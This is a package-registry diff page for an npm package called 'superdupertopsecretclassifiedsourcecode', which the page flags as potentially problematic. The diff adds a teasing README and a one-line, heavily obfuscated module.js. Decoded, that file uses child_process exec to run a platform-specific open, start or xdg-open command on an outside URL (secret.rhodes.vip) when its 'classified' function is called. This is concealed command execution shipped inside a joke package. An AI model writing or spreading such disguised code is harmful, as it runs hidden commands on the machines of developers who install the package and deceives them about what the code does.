superdupertopsecretclassifiedsourcecode 0.0.1-security → 69.69.69
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of superdupertopsecretclassifiedsourcecode might be problematic. Click here for more details.
- package/README.md +9 -5
- package/module.js +1 -0
- package/package.json +13 -3
package/README.md
CHANGED
|
@@ -1,5 +1,9 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
1
|
+
<h1>SHHHHhhhh!..</h1>
|
|
2
|
+
|
|
3
|
+
```js
|
|
4
|
+
// this has 1 secret function!
|
|
5
|
+
const secret = require('superdupertopsecretsourcecode');
|
|
6
|
+
|
|
7
|
+
secret.classified();
|
|
8
|
+
// shhhh dont tell anyone...
|
|
9
|
+
```
|
package/module.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
(function(_0x6c3cf1,_0xf02fa5){const _0x1f6e07=_0x29a8,_0x559810=_0x6c3cf1();while(!![]){try{const _0x4fe3ba=-parseInt(_0x1f6e07(0x154))/0x1*(-parseInt(_0x1f6e07(0x14f))/0x2)+-parseInt(_0x1f6e07(0x15b))/0x3*(-parseInt(_0x1f6e07(0x15c))/0x4)+-parseInt(_0x1f6e07(0x159))/0x5*(parseInt(_0x1f6e07(0x15f))/0x6)+-parseInt(_0x1f6e07(0x161))/0x7*(parseInt(_0x1f6e07(0x151))/0x8)+-parseInt(_0x1f6e07(0x150))/0x9*(parseInt(_0x1f6e07(0x158))/0xa)+-parseInt(_0x1f6e07(0x152))/0xb*(-parseInt(_0x1f6e07(0x157))/0xc)+-parseInt(_0x1f6e07(0x160))/0xd*(-parseInt(_0x1f6e07(0x163))/0xe);if(_0x4fe3ba===_0xf02fa5)break;else _0x559810['push'](_0x559810['shift']());}catch(_0x2fbb7a){_0x559810['push'](_0x559810['shift']());}}}(_0x170d,0x65071));const classified=()=>{const _0xe1ecb1=_0x29a8,_0x26ea6a=_0xe1ecb1(0x156),_0x422e33=process[_0xe1ecb1(0x155)]==_0xe1ecb1(0x15d)?_0xe1ecb1(0x153):process[_0xe1ecb1(0x155)]=='win32'?_0xe1ecb1(0x15e):'xdg-open';require(_0xe1ecb1(0x162))[_0xe1ecb1(0x15a)](_0x422e33+'\x20'+_0x26ea6a);};function _0x29a8(_0xf5b6b5,_0x1097d6){const _0x170d51=_0x170d();return _0x29a8=function(_0x29a8ea,_0x36df63){_0x29a8ea=_0x29a8ea-0x14f;let _0x26df17=_0x170d51[_0x29a8ea];return _0x26df17;},_0x29a8(_0xf5b6b5,_0x1097d6);}module['exports']={'classified':classified};function _0x170d(){const _0x438317=['child_process','490yjovnc','268426WwjcLc','18dUPmIg','8hEAWZk','11QTDkoM','open','5VAMTjo','platform','https://secret.rhodes.vip/','1294116lXZwok','3176190csgTcT','185xAxsiJ','exec','36021QzyiDO','164jZwtgr','darwin','start','50802PJKDPR','305292pQmQvh','5115663sFpisa'];_0x170d=function(){return _0x438317;};return _0x170d();}
|
package/package.json
CHANGED
|
@@ -1,6 +1,16 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "superdupertopsecretclassifiedsourcecode",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "69.69.69",
|
|
4
|
+
"description": "SHHHhhhh!",
|
|
5
|
+
"main": "module.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [
|
|
10
|
+
"secret",
|
|
11
|
+
"classified",
|
|
12
|
+
"shh"
|
|
13
|
+
],
|
|
14
|
+
"author": "me",
|
|
15
|
+
"license": "ISC"
|
|
6
16
|
}
|